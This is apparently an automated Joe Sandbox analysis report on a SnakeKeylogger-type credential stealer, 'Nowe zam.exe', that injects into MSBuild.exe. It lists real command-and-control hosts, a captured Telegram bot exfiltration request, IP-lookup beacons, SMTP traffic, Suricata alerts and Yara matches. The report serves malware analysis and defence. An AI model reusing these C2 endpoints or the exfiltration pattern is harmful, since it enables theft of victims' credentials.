Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: DHH-ASSI DHH-ASSI

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49713 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49717 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49724 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49716 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.12:49741 -> 212.44.112.138:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49722 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.tlakovec.si

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 07 Nov 2024 11:49:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.tlakovec.si
Source: Nowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49733 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_0097D66C	0_2_0097D66C
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_04B1DEE8	0_2_04B1DEE8
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F8BE0	0_2_050F8BE0
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050FF718	0_2_050FF718
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F66E0	0_2_050F66E0
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050FC0C1	0_2_050FC0C1
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050FF2E0	0_2_050FF2E0
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F2C22	0_2_050F2C22
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F2C30	0_2_050F2C30
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F3F00	0_2_050F3F00
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F8E60	0_2_050F8E60
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F8E70	0_2_050F8E70
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F3EF0	0_2_050F3EF0
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F7890	0_2_050F7890
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F78B8	0_2_050F78B8
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F78C8	0_2_050F78C8
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050FFB41	0_2_050FFB41
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050FFB50	0_2_050FFB50
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F8BDE	0_2_050F8BDE
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_050F0A08	0_2_050F0A08
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_090D59B8	0_2_090D59B8
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_090D0D90	0_2_090D0D90
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_090D11C8	0_2_090D11C8
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_090D11C5	0_2_090D11C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2A088	4_2_00F2A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2C147	4_2_00F2C147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2D278	4_2_00F2D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F25370	4_2_00F25370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2C468	4_2_00F2C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2C738	4_2_00F2C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F269A0	4_2_00F269A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2E988	4_2_00F2E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F23A99	4_2_00F23A99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2CA08	4_2_00F2CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2CCD8	4_2_00F2CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F23E09	4_2_00F23E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F26FC8	4_2_00F26FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2CFAA	4_2_00F2CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F229E0	4_2_00F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00F2F961	4_2_00F2F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B1E80	4_2_065B1E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B17A0	4_2_065B17A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BFC68	4_2_065BFC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B9C18	4_2_065B9C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BE258	4_2_065BE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B0B30	4_2_065B0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B9328	4_2_065B9328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B5028	4_2_065B5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B2968	4_2_065B2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B1E70	4_2_065B1E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BDE00	4_2_065BDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BE6B0	4_2_065BE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BE6AF	4_2_065BE6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BEF51	4_2_065BEF51
